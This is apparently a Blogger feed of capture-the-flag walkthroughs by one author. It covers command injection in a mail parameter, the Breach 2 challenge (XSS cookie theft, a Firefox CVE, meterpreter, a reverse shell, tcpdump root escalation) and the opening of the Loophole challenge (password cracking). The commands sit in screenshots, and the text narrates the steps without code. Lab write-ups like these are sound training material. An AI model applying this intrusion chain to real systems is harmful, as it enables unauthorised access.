<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp3hCJo-FxOhS5JN4uWEkPNwcdehJ8fajSFY79rXTpJsqHz85jnfTDAMost9Thmm62_dO-k3J1fqcRfdsvuXb8h8q4qLye-0OZYeu_M4UdAsvIfgGhkMCw6DLGB3hAjnYZqSXWO0Wyl4Y/s1600/sc.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="343" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp3hCJo-FxOhS5JN4uWEkPNwcdehJ8fajSFY79rXTpJsqHz85jnfTDAMost9Thmm62_dO-k3J1fqcRfdsvuXb8h8q4qLye-0OZYeu_M4UdAsvIfgGhkMCw6DLGB3hAjnYZqSXWO0Wyl4Y/s640/sc.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Hmmm, in the source code, we can see that mailer file has <b>mail</b> parameter. Let's play with it.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAalYiZyX4OjFDU9x4N_QBqoCVp3dR2C23mXutql8aCcfbOy1xTBF4849_tsW8-QXQyt913dT9XEq3qs88RnbJaRCJYI-UVuGZx6v9dTrfbYjBiiEGUCA30lVyH2S0RpgfPXYehqzQCPo/s1600/dasd.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="123" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAalYiZyX4OjFDU9x4N_QBqoCVp3dR2C23mXutql8aCcfbOy1xTBF4849_tsW8-QXQyt913dT9XEq3qs88RnbJaRCJYI-UVuGZx6v9dTrfbYjBiiEGUCA30lVyH2S0RpgfPXYehqzQCPo/s400/dasd.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Excellent! <b>mail</b> parameter can execute bash command!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDF8yBKMw-pwDvKYDuk7JqaFQ-wEOXWH1mT6FHArUhpfZW6sJcCbuQ2HDOYQvuWdCkdAXNz6BZolGOyDepGZFoG4CHNrja9qpHwYqE-oyvp_JirVCEPUb27qehqs0E7obsaZ3H8If0b7o/s1600/rs.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="425" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDF8yBKMw-pwDvKYDuk7JqaFQ-wEOXWH1mT6FHArUhpfZW6sJcCbuQ2HDOYQvuWdCkdAXNz6BZolGOyDepGZFoG4CHNrja9qpHwYqE-oyvp_JirVCEPUb27qehqs0E7obsaZ3H8If0b7o/s640/rs.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Great! We have limited shell! Let's investigate what kind of privileges we have.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirF-qwc1SOYiYvL1iTXUcMNrvHDVjNIMWpIRjz8JjUUekfHnLg3kGePzjxs_BZD8YV2624eYSx5k8Um80D6ZB6-oHPq2ZwjI-pmD_6usRaOCo3oWFhKOfVh7_litI3mOWQe7Dt9BG6mf8/s1600/sudo_l.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="287" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirF-qwc1SOYiYvL1iTXUcMNrvHDVjNIMWpIRjz8JjUUekfHnLg3kGePzjxs_BZD8YV2624eYSx5k8Um80D6ZB6-oHPq2ZwjI-pmD_6usRaOCo3oWFhKOfVh7_litI3mOWQe7Dt9BG6mf8/s640/sudo_l.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Good, we have full control on firewall, so le'ts flush rules.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTaeu_ODFqVLvOnEqxu-9CVXrOG4XvmtzLlqbPj2Qm8n8b-TxO3RRDGOGftuG3VlJ7XLj38tKyke-imHtelqrHIiF-w3uSNKM6mLVQPZXTJ1bRFnZQvJX65bgLC3PXZydXIBMo2aXb5sk/s1600/iptables.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTaeu_ODFqVLvOnEqxu-9CVXrOG4XvmtzLlqbPj2Qm8n8b-TxO3RRDGOGftuG3VlJ7XLj38tKyke-imHtelqrHIiF-w3uSNKM6mLVQPZXTJ1bRFnZQvJX65bgLC3PXZydXIBMo2aXb5sk/s400/iptables.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
OK, let's try connect to the IRC (port 6667) which was filtered before our action.<br />
Now we are able to connect to the IRC.<br />
<br />
[TBU] <br />
<br />
<br />
<br />rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-18404809108952665482016-12-08T11:08:00.002+01:002016-12-08T11:08:48.869+01:00I am back!Hi everyone,<br />
<br />
I would like to say - I am back! I will work on this blog as effectively as I can :-)<br />
<br />
I was working on my <b>Penetration with Kali Linux</b> course, so I was unable to publish new post on my blog.<br />
<br />
Probably on this week I will have added new posts :-)rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-48350870943839831812016-08-16T22:08:00.000+02:002016-08-24T11:38:20.979+02:00Breach 2 challenegeHello,<br />
"Second in a multi-part series, Breach 2.0 is a boot2root/CTF challenge which attempts to showcase a real-world scenario, with plenty of twists and trolls along the way."<br />
<br />
Scanning<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXq3ISg_H_jdcMfm6QucrXLjnyjRaH-rVWE6FK7AVJXDzz-ruFdNVtWYyr6HPGiQAXjKmCHmVEnm-dp7-43bvsk1lYnuWxPqngwC1Eej56qqeKOews3h-9BEiCf6yUeiJBykc0zxol12M/s1600/scann.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXq3ISg_H_jdcMfm6QucrXLjnyjRaH-rVWE6FK7AVJXDzz-ruFdNVtWYyr6HPGiQAXjKmCHmVEnm-dp7-43bvsk1lYnuWxPqngwC1Eej56qqeKOews3h-9BEiCf6yUeiJBykc0zxol12M/s1600/scann.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Good, we can see that there is not NFS for RPC. Let's check SSH.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWcTMYrlVuic1QnOliRMdGEjKjivUeGQdAfZVLi-3Nj5q4yM9_Q2cpiB97z5CokWO92uOo5BRMaGFA5JTbdbuwHhAspyv2mmh93bwXA9xlU0b65RlPejd9SZwiASb4XXvVcLaA7QY8sBE/s1600/ssh_banner.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWcTMYrlVuic1QnOliRMdGEjKjivUeGQdAfZVLi-3Nj5q4yM9_Q2cpiB97z5CokWO92uOo5BRMaGFA5JTbdbuwHhAspyv2mmh93bwXA9xlU0b65RlPejd9SZwiASb4XXvVcLaA7QY8sBE/s1600/ssh_banner.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Hmmm, blog? Scanning phase did not discover HTTP port. Let's try use password inthesource for peter SSH username.<br />
Voila!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgefbsvDJbzp-F7oM4yO1xQq5pKj77JgJs6Eg1pBO7WbEPMNK9xrRvd-1H5So_0riunYarxwM643AonsUp7pKEZhi3oMLWmdQMB4RBSw3yjGkm-imAdx8HLBnlquQRrR8r3eKpXNHneEMI/s1600/ssh_open.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgefbsvDJbzp-F7oM4yO1xQq5pKj77JgJs6Eg1pBO7WbEPMNK9xrRvd-1H5So_0riunYarxwM643AonsUp7pKEZhi3oMLWmdQMB4RBSw3yjGkm-imAdx8HLBnlquQRrR8r3eKpXNHneEMI/s1600/ssh_open.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Excellent! We have opened 80 port! As far as I know, Apache 2.4.10 does not have dedicated public known exploit. So, let's examine the web application (blog)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvyqFvm9tDMJW6fkJ4f7CXqwzwrnrxRivhcNDG_o7uSUV_fhkbkmDZAtIvzUE_W_FhXLk8aSrl7eIgI0ZCI2UpSgIhD1E4-hNJJd4OJH1fNV09DBcQl2JA9cLdayFuzrCeE-bilc6O8gE/s1600/www.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvyqFvm9tDMJW6fkJ4f7CXqwzwrnrxRivhcNDG_o7uSUV_fhkbkmDZAtIvzUE_W_FhXLk8aSrl7eIgI0ZCI2UpSgIhD1E4-hNJJd4OJH1fNV09DBcQl2JA9cLdayFuzrCeE-bilc6O8gE/s640/www.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Ok, source code doesn't contain credentials and anything like that - only hint that web application administrators do not trust user. We know two exploits for BlogPHP CMS - XSS Stored and Remote Privilege Escalation. For me more interesting is the second.<br />
Unfortunately it is not work, so let's try exploit XSS.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtZSHUd-NvY3yv8zqlIEjesrwTG5L1eSxgV26QyayS_R7v5EgIV23i7DDI4PqOkBLiDQvzMsmDRlLn_KkEktGJCdi-J83BDQavzMH54-bhsHkR7gprJCm857VAC2hj1mVCFXrFWDPWzm0/s1600/hook.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtZSHUd-NvY3yv8zqlIEjesrwTG5L1eSxgV26QyayS_R7v5EgIV23i7DDI4PqOkBLiDQvzMsmDRlLn_KkEktGJCdi-J83BDQavzMH54-bhsHkR7gprJCm857VAC2hj1mVCFXrFWDPWzm0/s1600/hook.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Probably we are on the right way.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEBWYnZaN4N0LU_tBUY-1a13Rl_XZ9FSvI6Vepq8STXDE0wlMB-0DmLLWgeTBlsLPkvmiPcLTubO-CljWbN7U0ahOoNXIeQ-UIdE3Ej7rxsC5_X-UgGuG2dammt_QVNMf2Yd-u_Kp0DyE/s1600/cookie.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="118" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEBWYnZaN4N0LU_tBUY-1a13Rl_XZ9FSvI6Vepq8STXDE0wlMB-0DmLLWgeTBlsLPkvmiPcLTubO-CljWbN7U0ahOoNXIeQ-UIdE3Ej7rxsC5_X-UgGuG2dammt_QVNMf2Yd-u_Kp0DyE/s640/cookie.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Good! We have got administrator cookies. I was trying use stolen credentials, but without success... Let's look at Firefox version - 15.0. It is so old.<br />
Let's look for some exploit. BINGO - CVE: 2013-1710!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicXtb-YVhCvz_RpBOgcpJT8qScpN6u2u5ayl3r2arCZi3dtjYiZg8a9MSEGA9_KDNpSVHOmm2hRG4un23P-yiPAe4tG4lEWKJQsGi4cWsJr9viIeejROXr6ipWXD-NN0LWUFfztwFXgPI/s1600/exploit.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="325" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicXtb-YVhCvz_RpBOgcpJT8qScpN6u2u5ayl3r2arCZi3dtjYiZg8a9MSEGA9_KDNpSVHOmm2hRG4un23P-yiPAe4tG4lEWKJQsGi4cWsJr9viIeejROXr6ipWXD-NN0LWUFfztwFXgPI/s640/exploit.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Great! We have got limited shell! Let's upgrade our limited shell to meterpreter session.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha4dFHTHj_t8hhU2Bu1K-nqWsOwGfHPYOyXmi-KLZQ4qn3YQducYW-AWSEkWGUkM33IwQ2-ku3buGzPddTy_RdTVz6LTmws7X3588YJhY8kCA7Qib97Fwy8BN8XRfCj8DPtvw8_MkJQJA/s1600/meter.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="325" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha4dFHTHj_t8hhU2Bu1K-nqWsOwGfHPYOyXmi-KLZQ4qn3YQducYW-AWSEkWGUkM33IwQ2-ku3buGzPddTy_RdTVz6LTmws7X3588YJhY8kCA7Qib97Fwy8BN8XRfCj8DPtvw8_MkJQJA/s640/meter.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
So, good! I have got a shell and run <b>netstat -antp</b> to find what kind of services is running on our victim machine. There is 2323 so I decided to perform remote port forwarding to my 7777 port and<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg06UD5qRGD6-xFRLQU9W_G5cOW7894hj_0z0kjLRPGuePPWXy4Zo97prCmakG4RBMByb0vE8zDWGwX1l-0ii1tpxwoZ2f40zjSM7DoI3rNCLDTdB_TX04baa9GyYvox2jpF8hMt1_ehDE/s1600/tel.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg06UD5qRGD6-xFRLQU9W_G5cOW7894hj_0z0kjLRPGuePPWXy4Zo97prCmakG4RBMByb0vE8zDWGwX1l-0ii1tpxwoZ2f40zjSM7DoI3rNCLDTdB_TX04baa9GyYvox2jpF8hMt1_ehDE/s1600/tel.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Hmmm, strange... But the numbers indicates Houston City in Texas (USA). Maybe it is a password for milton, peter, bill or blumbergh? Let's try. It works for milton! I run again netstat -antp and there is interesting port 8888, so again - let's perform remote port forwarding!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLWnY6fVqiRwGemS2rqTY0Jwpt6EdmUpH-lwdX4_TshjPU4tqmYNr3tD5BL42UTQc_ZaXByfc09zEBa7jsM78OV-rG5NPdFKV1b5rI9RXL-C4Svhcp5eKT-qxtIGxM9buZWbKujr5ySPA/s1600/shell.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="617" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLWnY6fVqiRwGemS2rqTY0Jwpt6EdmUpH-lwdX4_TshjPU4tqmYNr3tD5BL42UTQc_ZaXByfc09zEBa7jsM78OV-rG5NPdFKV1b5rI9RXL-C4Svhcp5eKT-qxtIGxM9buZWbKujr5ySPA/s640/shell.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Good! Let's browse it. BINGO!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhavrM8iDwJ0JgflF_YRObMYm_VquhlCBp0NFPiejqirFxBEYf5msbM8KX5FBBhSiTfj-jFC7tRXFzU36XE3XMOI_-PliA_JGw76_VSP2a9UdfY_zTjErs-UHC45HgNOlroKMXicDhLjvQ/s1600/web.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="151" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhavrM8iDwJ0JgflF_YRObMYm_VquhlCBp0NFPiejqirFxBEYf5msbM8KX5FBBhSiTfj-jFC7tRXFzU36XE3XMOI_-PliA_JGw76_VSP2a9UdfY_zTjErs-UHC45HgNOlroKMXicDhLjvQ/s640/web.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
OK, let's click on oscommerce link<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUzdOg4OFxzfxJ0Uw-bOOBmdUh5LGSQv8QLSv6FN6LXyP_YK0alUK-7aplW-vBowyYUEsI74hIcYaCs6ehTNYGXPGd6RhG1co_Zw8Qd39CgTVQ9-eCHtEJRCrdVJTiTkhczeTJUXPdK1k/s1600/os.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUzdOg4OFxzfxJ0Uw-bOOBmdUh5LGSQv8QLSv6FN6LXyP_YK0alUK-7aplW-vBowyYUEsI74hIcYaCs6ehTNYGXPGd6RhG1co_Zw8Qd39CgTVQ9-eCHtEJRCrdVJTiTkhczeTJUXPdK1k/s640/os.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Very good, dirb found admin panel but there doesn't work credentials which we stole using SQL Injection. But admin:admin works!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0nR-bZzKV2NEiaUVESKoJyPnq7BmKJacmI-hUObktZxZP8Z8e9r0i1l58NmyCvn8af43TglJ0mEldfAI8OwGJbSyBrxB85VfeBhNjQ7scTUkBV7nV0LROCoJ42j7L5j_BMqK2dsvfxlI/s1600/admin.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="153" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0nR-bZzKV2NEiaUVESKoJyPnq7BmKJacmI-hUObktZxZP8Z8e9r0i1l58NmyCvn8af43TglJ0mEldfAI8OwGJbSyBrxB85VfeBhNjQ7scTUkBV7nV0LROCoJ42j7L5j_BMqK2dsvfxlI/s640/admin.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Nice! I have found File Manager<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNM_cMg1-YvICM_Q-c1xO1_aPyZntRfhCYXapDMq2rFVPTay_rEGJynusYnUs8WsQwoF8piKhTogQS8G_7Oi-BF_Tl9QU1INuM3NoVFn0oqZzQ0hU_6Pvyb5DP5geIPZp66qSGTzKzjW8/s1600/file_manager.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNM_cMg1-YvICM_Q-c1xO1_aPyZntRfhCYXapDMq2rFVPTay_rEGJynusYnUs8WsQwoF8piKhTogQS8G_7Oi-BF_Tl9QU1INuM3NoVFn0oqZzQ0hU_6Pvyb5DP5geIPZp66qSGTzKzjW8/s640/file_manager.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
So, let's try upload reverse shell. TO do this - we have to find writable directory. BINGO! Work directory is writable - I have uploaded reverse shell script and<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQhOS97PgdyszTxqYH4fyLX3oSmMyVxsX-IDO-ZaJeZoYHsYdbL8AtesaEfluTbn114ls8fyq68e8Z8O6rD0tB6UGlmnLCRoMNVdN386YyywgAR6Ou_2rPVmcBCjy2nTgelevRLz44YXM/s1600/rev.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="264" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQhOS97PgdyszTxqYH4fyLX3oSmMyVxsX-IDO-ZaJeZoYHsYdbL8AtesaEfluTbn114ls8fyq68e8Z8O6rD0tB6UGlmnLCRoMNVdN386YyywgAR6Ou_2rPVmcBCjy2nTgelevRLz44YXM/s640/rev.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Excellent! Now we have to use tcpdump to get root shell. I found great article about it.<br />
I followed step by step and I have obtained reverse ROOT shell.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwpkVjMZoptjdLH9xa1cxMrtoKtYHxL4q2nOfn-oGV8kpevWgA5xcgZE3KOgyPdYZhwhL04mFyy4CLQ6vB5wcmkBPKCgXE63yeiDCfFFnQiRGnrW_sFh86mF_gY1dgqyb7YYMt9JD7BAU/s1600/root.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwpkVjMZoptjdLH9xa1cxMrtoKtYHxL4q2nOfn-oGV8kpevWgA5xcgZE3KOgyPdYZhwhL04mFyy4CLQ6vB5wcmkBPKCgXE63yeiDCfFFnQiRGnrW_sFh86mF_gY1dgqyb7YYMt9JD7BAU/s1600/root.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Unfortunately /root/flag.txt file does not exist so, let's locate flag file.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuwKqVQvm8BAiF_tiPHJ1dGnrsoxCM0xKhoGo3m6Tq82LYzDLN4eBMbLEL3HgLNDDfkadGwIRtjtAtcQgxRgMQCDJi-4Bh6bVmWeepY6HtGIAS-BjC_cF7gSqchbMJ5KhvQHVc6VlUKRc/s1600/gma.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="538" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuwKqVQvm8BAiF_tiPHJ1dGnrsoxCM0xKhoGo3m6Tq82LYzDLN4eBMbLEL3HgLNDDfkadGwIRtjtAtcQgxRgMQCDJi-4Bh6bVmWeepY6HtGIAS-BjC_cF7gSqchbMJ5KhvQHVc6VlUKRc/s640/gma.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Game over!<br />
<br />
This challnege was extremely amazing!<br />
<br />rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-62817311885618508802016-08-11T10:45:00.000+02:002016-08-11T10:47:05.788+02:00Loophole challengeHi,<br />
<br />
"We suspect that someone inside Rattus labs is working with known terrorist group. Your mission is to infiltrate into their computer network and obtain encrypted document from one of their servers. Our inside source has told us that the document is saved under the name of Private.doc.enc and is encrypted using OpenSSL encryption utility. Obtain the document and decrypt it to complete the mission."<br />
<br />
Scanning<br />
<br />
<br />
We can play with Samba server, web application and SSH.<br />
<br />
Web application<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjq_no7haZld2zcxMqMGDy5booygmFHEoNCkgDISEzXuFs2mkmZ1LpM2qgD27m9QdSIOFhCea56OdpEvF4OUVVG5EnQqV5-bz_aEUF8_5BHldZklWOGTYPUg1Pzz879oXT5hLnq5kfQxiU/s1600/web.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="309" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjq_no7haZld2zcxMqMGDy5booygmFHEoNCkgDISEzXuFs2mkmZ1LpM2qgD27m9QdSIOFhCea56OdpEvF4OUVVG5EnQqV5-bz_aEUF8_5BHldZklWOGTYPUg1Pzz879oXT5hLnq5kfQxiU/s640/web.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Hmmm, nothing special. If you click on <b>here</b> link, you will get page which contains several email addresses.<br />
So, I have decided to run Dirb<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii_1-cBgTOw2yBftEK8W0UzHYpows_NhfzeG-xNU6bQWdyGKnwFmViX79Ca-R2Ui0PxP4LxuN8l0664dReS4ewgPi8YOuH4GB-mWz2LLJkFKlrg3q3sUD-AxhyphenhyphenVP6MXrvXYf6X0ExqC2I/s1600/dirb.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii_1-cBgTOw2yBftEK8W0UzHYpows_NhfzeG-xNU6bQWdyGKnwFmViX79Ca-R2Ui0PxP4LxuN8l0664dReS4ewgPi8YOuH4GB-mWz2LLJkFKlrg3q3sUD-AxhyphenhyphenVP6MXrvXYf6X0ExqC2I/s1600/dirb.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Good, for me very interesting may be <b>~root</b>, <b>garbage</b> and <b>info.php</b> files.<br />
Unfortuately we don't have enough privileges to view ~root directory, but garbage file is very attractive for us!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7mjkfv7WknshKRBm1sMINnYBQDKRiIPx_4RWTonrcp0lTZ-jW0oQPki84MaYori_l6nQs2mIqSDX7QIi9aRgmDkSNhvENxiHb_xX7meTF4Xw0Kot2fFVqiKti1HFTlEmUQIl0yCBns8Y/s1600/garbage.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7mjkfv7WknshKRBm1sMINnYBQDKRiIPx_4RWTonrcp0lTZ-jW0oQPki84MaYori_l6nQs2mIqSDX7QIi9aRgmDkSNhvENxiHb_xX7meTF4Xw0Kot2fFVqiKti1HFTlEmUQIl0yCBns8Y/s1600/garbage.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Something like shadow file, isn't it?<br />
Let's try crack it!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ9j_hkQIxZRh0-JL4h1VjsqBhXHUDKGYjUVJshRxkTM7A8vPE8jY0fLc0EB8Erslk7BMcQxzT7Fu6sB3mVSLFMYBkCFafJTGlf9mQ_inyDIexcYS7aR6lGbcC_Jr1WoR5RUJupklSBtM/s1600/john.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="123" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ9j_hkQIxZRh0-JL4h1VjsqBhXHUDKGYjUVJshRxkTM7A8vPE8jY0fLc0EB8Erslk7BMcQxzT7Fu6sB3mVSLFMYBkCFafJTGlf9mQ_inyDIexcYS7aR6lGbcC_Jr1WoR5RUJupklSBtM/s640/john.png" width="640" /></a></div>
